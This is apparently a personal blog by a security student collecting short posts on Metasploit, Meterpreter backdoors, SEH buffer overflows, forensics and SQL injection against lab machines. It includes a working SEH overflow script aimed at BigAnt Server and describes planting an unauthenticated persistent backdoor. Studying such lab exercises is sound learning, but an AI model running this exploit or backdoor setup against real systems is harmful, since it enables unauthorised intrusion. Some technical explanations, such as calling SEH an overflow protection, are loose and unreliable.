Saturday, July 21, 2012

Wicd Applet in Backtrack

All of you who have installed BackTrack will have noticed that by default the Wicd network manager applet is not shown in the panel. This doesn't affect the stability of the system, but it is quite annoying to have to open it from the main menu every time you want to connect to a WiFi network.

Follow these steps to fix it.

- Click System > Preferences > Startup Application

Friday, July 6, 2012

Critical System Files

Here are some critical system files that must be protected by applying the correct file permissions. Applying the wrong file permissions may result in a complete system takeover by a hacker/cracker.
image source : www.linuxsecurity.com

"the quieter you become, the more you are able to hear.."

Thursday, May 3, 2012

Security and Attacking Seminar with Onno W. Purbo

Yay, finally Mr. Onno W. Purbo will come to my university to give a seminar about Information Security. Mr. Onno W. Purbo is a well-known IT expert in Indonesia. He is an expert who can make IT topics that are actually difficult to understand become very, very easy to understand, even for beginners. More interestingly, everything he talks about is open source. I can say that he is the father of open source in Indonesia. More info about Mr. Onno W. Purbo can be found on Wikipedia.


Wednesday, May 2, 2012

Hex Generator

Finding bad characters when developing an exploit is important to make the exploit work properly, as we want. In my post about searching for bad characters I used a Perl script to generate a series of hex characters from 00 to FF. Here's another script used to generate it. I found the script at this site. It is written in Python.

Download here.

Script:
#HEX Generator
#http://www.digital-echidna.org
#0x04112011

def gene():
    # Build a quoted string of every byte value from 0x00 to 0xff as
    # "\xNN" escapes, 16 bytes per line, so the whole range can be pasted
    # into a payload when hunting for bad characters.
    lines = []
    for start in range(0, 256, 16):
        row = ''.join('\\x%02x' % x for x in range(start, start + 16))
        lines.append('"' + row + '"')
    hslgen = '\n'.join(lines)

    print("\n#Generated with dE HEX Generator")
    print("#http://www.digital-echidna.org\n")
    print(hslgen + '\n')

if __name__ == "__main__":
    gene()

Tuesday, May 1, 2012

Metasploit ~ Upgrade Command Shell into Meterpreter

As I said in my post about Meterpreter, it is an advanced payload that can do a lot of advanced tasks after a system is exploited. But what if we can only get a normal command shell after exploitation? It is of course rather difficult to do the post-exploitation steps then. But that doesn't matter now, because one of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter shell payload once the system has been exploited. This can be done by issuing "sessions -u <selected session>". This is useful if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks.

OK, let's get started. I'll use the Metasploit console version, and the system that will be exploited is a Windows XP SP3 machine in my VirtualBox.

Wednesday, April 25, 2012

Upgrading to BackTrack 5 R2

A while ago, the best Linux pentesting distribution, "BackTrack", released its update, BackTrack 5 R2.

With a new 3.2.6 kernel, a huge list of new and updated tools and security fixes, BackTrack 5 R2 will provide a more stable and complete penetration testing environment than ever before. For those of you who don't want to reinstall BackTrack to get R2, you can perform these steps to upgrade your BackTrack 5 R1 to R2.

Sunday, March 25, 2012

Digital Forensic Analysis

After a week of hibernation, it's time to move again..  >:)

So, in this post I'll try to perform a simple digital forensic analysis on an image of a floppy disk. You can download it here :
I use the BackTrack OS in this post, because Linux already includes some basic forensic analysis tools.

BASIC LINUX FORENSIC TOOLS
As I said before, Linux comes with some basic forensic analysis tools such as :

Sunday, March 18, 2012

MP3 File Structure

A file structure is what makes up a file. A file is the smaller form of a filesystem. A file can't be called a "file" when it is not structured. The structure of a file is important to make that file readable, because when it is not properly structured I bet the system won't be able to read it. And I think there's also a standardization of file structures, so a PDF file named A will have the same structure as B, C, D or any other PDF file. The file structure of each file type is also different. An .avi file will have a different file structure from a .doc file.
In this post I'll try to explain the structure of an MP3 file.   :)
Who doesn't know MP3? MP3, or to be more specific, MPEG-1 or MPEG-2 Audio Layer III, is a patented digital audio encoding format using a form of lossy data compression. It is a common digital audio format used widely in the world. When we talk about MP3, it cannot be detached from music. I think we listen to music every day. And I think you already know that most music is encoded with this format.

The Magic Number


Hoho, in this post I'll explain a thing called the "Magic Number". Can you guess already what it is? Some kind of number that has a magical spell in it? Some kind of magic trick that uses numbers as its medium? Or something else?

Unfortunately, the "magic number" in this post is not literally related to magic. This magic number is something related to a file format. Originally, the term was used for a specific set of 2-byte identifiers at the beginning of a file, but since any undecoded binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. Identify what? To identify a file format, of course.

What is Unallocated Space?

When you're installing an operating system on a new hard disk, do you notice that the installer says your disk status is Unallocated? Or when you want to divide a hard disk into two or more partitions, after the split the newly created partition is also in the "Unallocated" status. So what is this thing called unallocated?

Unallocated space, or in other words "free space", is logical space on a hard drive that can be used by the system to put files on. Unallocated space is the opposite of "allocated" space, which means a place on the hard drive where files are already written or stored. Unallocated space is different from slack space. The difference is that the system can put files in unallocated space, while it can't put any files in slack space. Simple, right?  :)

Saturday, March 17, 2012

Slack Space

Again, in this post I'll try to explain something related to computer digital forensics, that is, slack space.

On a storage device, when a file is saved, it is stored at the beginning of a cluster. A cluster itself is like a directory in the storage. It consists of some sectors. Imagine a house fully filled with 50 cupboards that have 4 drawers each..
Get it?  :D
Let's say that this house is the hard disk, the cupboards are the clusters, while the drawers in each cupboard are the sectors. So, we can say that this hard disk has 50 clusters and 4 sectors in each cluster.
cmiiw..  :)


Thursday, March 15, 2012

File System at Glance

When we want to learn about computer forensics, the file system can't be excluded from our learning material. So, in this post I'll explain a little about file systems.


A file system is a method of dealing with files on a computer: how the data is organized, stored, updated and modified, as well as how the available free space on the storage media is managed. The type of file system is usually adjusted to the characteristics of the storage device. So, the file system of a hard disk is usually different from the file system of a flash disk or a floppy disk. Another adjustment includes the operating system as a parameter. Windows file systems (usually FAT or NTFS) are different from Linux file systems (ext2, ext3, ext4), as well as Mac file systems. Still, nowadays an operating system is able to use more than one file system.

Wednesday, March 14, 2012

MBR ~ Master Boot Record


Computer forensics mostly deals with storage devices like flash disks, hard disks, CDs, DVDs, RAM, etc. There are two types of storage, volatile and non-volatile. Dealing with a volatile storage device like RAM is more difficult, because when the computer is turned off the data inside disappears and some evidence may be lost too. Dealing with non-volatile memory like a flash disk or hard disk isn't easy either. A wrong method will make evidence found on the memory no longer valid.

On a hard disk, there is something called the MBR or Master Boot Record. The MBR contains a series of code which makes the hard disk able to boot the system. IBM is the one who made it well known to the world. Usually, the MBR is located in the first sector of the hard disk. Some of the MBR's tasks are :
1. Recording the partition table on the system, which contains the details of the partitions of a storage device on the system.
2. Bootstrapping an operating system.
3. Identifying individual storage media.

Monday, March 5, 2012

Advanced Web Application Hacking

Nowadays, most people, especially engineers, have a website. They usually use it to share their activities, show their work, make a portfolio, etc. But few people are concerned about the security of their website. They usually won't do anything about the security of their website before it is attacked by a hacker. They don't know the importance of their web security before someone breaks into it.

In this post, I'll try to show how to gain root access through a web application. There are a lot of methods to do that; this is one of them. The web application that will be used is DVWA (Damn Vulnerable Web Application). You can download it here. The installation instructions are there too.

- Start up your apache and mysql.

Wednesday, February 29, 2012

Interact With Metsvc Backdoor

To interact with the Meterpreter backdoor service we created before, we can use a multi_handler with a windows/metsvc_bind_tcp payload to connect to the backdoor.
To remind you again, this backdoor requires no authentication to connect. So it is a dangerous backdoor to use, since anyone can use it too.

OK, here's a way to connect to the metsvc backdoor we created before.

- Load up your msfconsole

Meterpreter Backdoor

Again, Meterpreter is the most convenient payload to use. Part of the hacking framework is creating a backdoor for later use, so we don't need to go through the normal attack to access the system again. Meterpreter can make a backdoor on a system that we've successfully exploited, letting us get a Meterpreter shell anytime we want. Cool, right..  :D
There's a module called "metsvc" that will create a persistent backdoor on a system. This module was created by Alexander Sotirov. Read more here: http://www.phreedom.org/software/metsvc/. One thing to keep in mind: metsvc requires no authentication. This means anyone can access our backdoor if they know the port that we use. This is not a good thing if you are performing a real pentest.

Meterpreter ~ Basic Usage

Here are some basic Meterpreter commands you can practice..  :)

- help
Displays all commands that can be executed by Meterpreter.

- background
Returns to the msf shell and sends the current Meterpreter session into the background. To interact with it again, just type 'sessions -i [id]'.

Meterpreter

Meterpreter (meta-interpreter) is an advanced payload included in the Metasploit Framework. In my opinion this is the best payload ever. It can upload/download the victim's files, read stored password hashes, do keylogging, and even run a VNC server on the victim's machine.

Meterpreter is compatible with most of the exploits and auxiliaries in Metasploit, making it the most sophisticated and the most used payload by pentesters and hackers. The way it accomplishes this is by allowing exploit developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.

Monday, February 27, 2012

Exploit Combo ~ BeEF & Metasploit

Exploitation is so much fun and exciting for me..  :D
In this post I'll try to combine BeEF and Metasploit to create an attack. BeEF, the Browser Exploitation Framework, is a great tool to exploit XSS vulnerabilities on a site. My target for the attack is still my XP SP3 machine.

Let's get started..  >:)

- First, start your BeeF-ng services..

MSFpayload & MSFencode

Again, in this post I'll explain some of the Metasploit features..  :)

- MsfPayload
msfpayload is the Metasploit tool to generate a payload for an exploit. Its function is the same as msfweb, which I use in my other posts, but this tool is console-based, so it's rather difficult for newbies to use. But with regular practice, this tool is better than msfweb because it greatly saves time and RAM.
# msfpayload -h

Social Engineering ~ Definition and Tool

In this post I'll explain the definition of social engineering and the tools to do it. Although it's only a little and not in detail, I think it's enough to help you understand social engineering better.

Let's talk about vulnerability first.
A vulnerability is a weak point that exists in a system. Vulnerabilities exist not only in hardware and software, but also in the environment, the network and also the administrator/user. Social engineering is the technique of attacking the human vulnerability; usually the biggest vulnerability that exists in humans is low security awareness.

Working With Metasploit Auxiliary

Metasploit is a powerful framework for exploitation. There are a lot of things we can do with it. Exploits, payloads, encoders, and auxiliaries are ready to be used for exploitation. In this post I'll explain a little about Metasploit auxiliaries and how to use them.

An auxiliary is a set of tools developed to perform reconnaissance like scanning, sniffing, fingerprinting and other security tasks. With these auxiliaries, we can use Metasploit to do the earlier steps of the hacking framework without other tools; just Metasploit with its auxiliaries and other modules will make our security tasks far easier.

So, here's an example of the use of an auxiliary..

Friday, February 24, 2012

Linux Exploitation : Stack Overflow

After a week full of Windows exploitation, this time I'll try to explain Linux-based stack overflow exploitation. There is no big difference between exploitation in Windows and in Linux. We still have to deal with memory registers, addresses, and payloads.

OK, let's begin..

- First, we must turn off ASLR on Linux. ASLR stands for Address Space Layout Randomization; it is a computer security method that randomly positions key data areas, usually including the base of the executable and the positions of libraries, heap, and stack in a process's address space. To turn it off, execute this command.

SEH Based Buffer Overflow : Elecard MPEG Player

In this post I'll try to exploit a software called Elecard MPEG Player that has SEH protection (Again??)  :D
Exploiting software is fun if we know the technique, and can be very frustrating if we can't exploit it even after hours of struggle.

Okay, let's get started.

- Install the software on the machine.

- Let's open a file to see what file extensions are supported by this software.

Wednesday, February 22, 2012

SEH Based Buffer Overflow : File Sharing Wizard

In this post, I'll try to exploit a software called "File Sharing Wizard" version 1.5.0 build 26-8-2008. This software has SEH protection. So, I'll use the same technique as when I exploited BigAnt Server.

Let's get started..

- The first thing to do is install the software on your XP machine.

- This is a file server, so we will use a remote exploit for our fuzzer.
- Search for the port this software is running on.

Sunday, February 19, 2012

Search for "Bad Characters"

In my post about exploiting BigAnt Server, when generating the payload I entered 0x20 and 0x25 as bad characters. How do you search for bad characters in the application that will be exploited? Here's the way to do it. The application that will be used is still BigAnt Server, but I think the method to find bad characters is the same in all applications. This knowledge is essential because without entering the right bad characters, our payload won't work properly as we wish.

Let's begin..  :D

- Use this fuzzer as the starting point.
Fuzzer:
#!/usr/bin/python
import socket
address="192.168.56.2"   # BigAnt Server lab machine
port=6660                # port BigAnt Server listens on
# Byte literals (b"...") so the script runs unchanged on Python 2 and 3
buffer=b"USV "
buffer+=b"\x90"*962                 # padding up to the SEH record
buffer+=b"\xeb\x06\x90\x90"         # next SEH: short jump (jmp +6) over the handler address
buffer+=b"\x6A\x19\x9A\x0F"         # SEH handler address (little-endian)
buffer+=b"\x90"*(2504-len(buffer))  # pad the request to 2504 bytes
buffer+=b"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print("Done")

Saturday, February 18, 2012

More About SEH and SafeSEH

As explained before, SEH (Structured Exception Handling) is the protection integrated in a system or software to handle abnormal flow of the program that can cause the program to act abnormally too (crash, hang, etc). SEH will prevent EIP from being overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forces hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU can also be controlled easily, like in the Direct Return Exploitation.

Friday, February 17, 2012

SEH Based Buffer Overflow - BigAnt Server

This time, I'll try to explain how to exploit a software that has SEH protection on its system, called BigAnt Server. SEH is an exception handler that protects EIP from being overflowed by abnormal flow in the software. This will force us to use a different attack vector and technique, because if we use the same technique as in the Direct Return Exploit the attack won't work because of SEH.

BigAnt Server is an Internet messenger server. The version of the software used in this post is 2.52 Service Pack 5.

Let's get started..  >:D

Monday, February 13, 2012

Buffer Overflow - VUPlayer

Again, in this post I will try to exploit a piece of software using the buffer overflow technique. The software is called VUPlayer.

Let's do some testing first to make the software crash. That will be my attack vector.

Alhamdulillah, this morning I succeeded in making the software crash on the first try. Here's what I did.

- Of course, installing VUPlayer on my Windows XP machine.

- Okay, I want to try adding a URL. (Of course the URL is not a valid one..  :P  )
- Making 1000 'A' characters in Notepad.

Saturday, February 11, 2012

Reverse Engineering Mini-Stream RM-MP3 Converter

Reverse engineering is an interesting advanced hacking technique to learn. Once we know the technique, I'm sure that when there is a bug in a program, even if the bug is only a little one, we can exploit that vulnerable point to hack our target machine.

So, in the other post we already did a reverse engineering technique against WarFTP. In this post we will try to do it with a software called Mini-Stream RM-MP3 Converter.

Let's get started.

- First, install the software on your XP machine.

- I'll search for some information in www.exploit-db.com/search.

Sunday, February 5, 2012

Reverse Engineering WarFTP

Finally, after preparing OllyDbg and WarFTP on our machine, it's time to put reverse engineering into action.

What I do in this post is based on my sensei's book titled "Harmless Hacking". Let's get started.

- Start your Windows XP machine.
- Open WarFTP and start its service by clicking Properties > Start Service

Saturday, February 4, 2012

Installing WarFTP for Reverse Engineering

The target for my first reverse engineering is a software called WarFTP, given by my sensei. In the other post we set up the debugger program; now let's install the software on the machine. (If you want to use WarFTP like in this post, you can download it here)

1. Again, I'll transfer the WarFTP master to my machine using a web server.

2. Download the master

Setup OllyDbg

OK, my sensei gave me a task to do reverse engineering on a software called WarFTP. Before doing that I must install OllyDbg first to debug the software. I'm using Windows XP SP3 in VirtualBox. So, let's get started.

1. Start up your XP machine.

2. I'll transfer the OllyDbg master to my machine using a web server. So I put the master into /var/www/files on my BackTrack. (If you haven't downloaded the master, you can go here)

Introduction to OllyDbg


In the previous post, we learned about reverse engineering. What we will talk about now is one of the tools used for that, called OllyDbg.

Before discussing OllyDbg, we must know what debugging is. Debugging is a structured process to find and reduce the number of bugs or defects in a computer program and repair them. When there is a bug in a system, especially when there are lots of subsystems in it, the debugging process becomes harder, because a change in one may cause bugs to appear in the others.

Reverse Engineering at Glance

Let's talk about reverse engineering briefly, because this is also an important thing to know when you want to become an expert hacker.

Reverse engineering is an activity to discover how something is made, how it works and what its purpose is. In other words, discovering the technological principles of something by analyzing its structure, function and operation. Usually the thing to be reverse engineered is taken apart from its original form and then each part is analyzed one by one thoroughly.

Introduction to SQL Injection & Blind SQL Injection

MySQL is one of the most famous database servers, used by many people in the world. However, many administrators don't set up MySQL correctly, and that makes the database injectable by a hacker.

SQL injection is a hacking technique that utilizes low security settings or a poorly designed database on a server. SQL injection is usually done by inserting a series of code into the URL or a form of a website. The vulnerability appears when the user input is not filtered correctly, so when the user inserts SQL characters into a form, that code will be executed by the database server. To know whether a site is injectable or not, simply put a ' character after the URL of the site. If an error appears like "You have an error in your SQL syntax, bla bla bla..." then the site is 99% injectable.

Buffer Overflow : Direct Return & SEH Based

In my other post we learned a little about buffer overflows. Now we will talk about two cases that happen when we do a buffer overflow, that is the Direct Return Exploit and the SEH Based Exploit, and what the difference between those two is.

- Direct Return Exploit
A direct return exploit happens to a program that can't handle an exception, a condition where an application tries to execute code outside its normal work cycle. As a result, when an application that can't handle an exception is buffer overflowed, the EIP registered in the buffer memory will be directly overwritten by the rest of the data that we use to overflow the application.

Friday, February 3, 2012

Buffer Overflow at Glance

Buffer overflow is one of the hacking techniques to gain root/administrator privilege access by exploiting vulnerabilities in weak applications installed/running on a system. How can this be done? The hacker makes an application/program that will make the buffer memory provided by the system for the target application overload and then overwrite the other buffers.

Introduction to Buffer Overflow : CPU Register

If we want to master the buffer overflow technique, first we must have knowledge of CPU registers. A register is the part of the processor's memory that can be accessed at high speed and is always used by the microprocessor as the medium to do its work.
An x86-based CPU uses 8 registers: EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP. Each of them is designed for a specific job that makes the CPU process information efficiently.

1. EAX Register
Used to perform calculations and store the value returned from a function call. Basic operations such as add, subtract, and compare are optimized in the EAX register. Special operations such as multiplication and division are also done by the EAX register.

Wednesday, February 1, 2012

Metasploit at Glance

There are a lot of explanations of Metasploit out there. But I'll try to explain it from my point of view.

Metasploit is the name of a project and a framework.
a. Metasploit Project
The Metasploit Project is an open-source computer security project that provides information about security vulnerabilities and aids in penetration testing. Some of its sub-projects are the famous Metasploit Framework, the opcode database, the shellcode archive, and security research. Simply put, the Metasploit Project is the project or activity around the computer security sector and the one that created the Metasploit Framework.

b. Metasploit Framework

Vulnerability at Glance

Let's talk about vulnerability..

Wikipedia : 
"In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements : a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface."

ISO 27005 :

Information Gathering Task



Bypassing Login Screen

OK, let's try to bypass the login screen on my testing web page located in /var/www/fbip.

1. Open the browser and type in the address bar
localhost/fbip
A simple, ugly web page will appear.

DVWA : SQL Injection

DVWA (Damn Vulnerable Web Application) is a web application that has a lot of security issues inside.
Let's try to inject it with sqlmap.

1. Start your mysql and apache2 services.
# service apache2 start
# service mysql start

2. Open your browser and type the URL of your DVWA.

Introduction to TOR and Proxychains

Let's talk about TOR and Proxychains. These two things are great tools to make us stay "anonymous" while hacking.

TOR first..
Tor is a network of virtual tunnels that allows Internet users to greatly improve their privacy and security while surfing the Internet. Actually, Tor was designed, implemented, and deployed as a third-generation onion routing project of the U.S. Naval Research Laboratory. But the information about it leaked, and now everyone can use it for a wide variety of purposes. It was originally developed with the U.S. Navy in mind for the purpose of protecting government communications.

Why do we need TOR?

Introduction to Google Hacking

Google hacking is a hacking technique that utilizes Google search and other Google services to find security holes or vulnerabilities in a site's configuration and any information on it.

Google hacking can be done by using advanced operators in the Google search bar to locate specific strings of text within search results. Simply, any advanced operators provided by Google can be used to help us find vulnerable sites.

Here's an explanation of Google hacking from Wikipedia :
"Google hacking is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use.

Introduction to Shodan

You know search engines like Google, Yahoo or Bing, right?

Shodan is like that. It is also a search engine. The difference between Shodan and a usual search engine is the thing that is searched. While Google, Yahoo or Bing are good for searching for websites, Shodan is a great search engine for finding specific computers (routers, servers, etc.), using various filters to make your search more specific.

Shodan lets you find servers or routers easily by using the search bar on its homepage. It can find which web servers are running what (for example, the web server with IP 114.166.242.76 is running Apache version 2.3.3)
Great search engine, isn't it?